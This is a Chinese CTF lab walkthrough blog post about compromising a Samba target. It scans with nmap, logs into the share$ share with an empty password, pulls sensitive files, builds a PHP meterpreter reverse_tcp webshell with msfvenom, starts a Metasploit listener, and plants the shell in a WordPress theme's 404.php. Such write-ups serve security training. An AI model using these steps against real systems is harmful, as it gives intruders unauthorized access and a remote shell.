CTF-Sanba共享

SMB(Server Message Block)协议是一个通信协议,一般使用的端口为139,445,后来Linux移植了SMB,并称为samba。SMB协议,计算机可以访问网络资源,下载对应的资源文件。
一般端口为139,445

信息探测

对于只是给定的一个对应ip地址靶场机器,我们需要对其进行扫描,探测开放的服务。

nmap -sV ip      挖掘开放服务信息

nmap -A -v -T4 ip     挖掘靶场全部信息

扫面之后发现, 端口开放了SMB服务,之后我们就可以进行登录 。登录时直接使用空密码。

指令如下:

smbclient -L ip

然后下面就会紧跟着打印驱动、一个共享文件夹(share$)、一个空连接。
然后进行如下指令打开共享文件夹:

smbclient '\\ip\share$'

在这里插入图片描述

输入指令ls查看共享的文件夹。发现share里发现许多敏感文件,用get下载下来到本地查看

get deets.txt

制作webshell

基本语法:

msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw > /root/Desktop/shell.php

启用监听:

在这里插入图片描述

msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 攻击机IP地址
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

上传webshell

一般会使用 dirb ip 进行网站探测
使用找到的敏感信息登录系统后台,上传webshell。执行webshell(访问具有webshell的php页面)

wordpress 上传点 theme 404.php
执行:http://靶场IP/wordpress/wp-content/themes/twentyfourteen/404.php

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值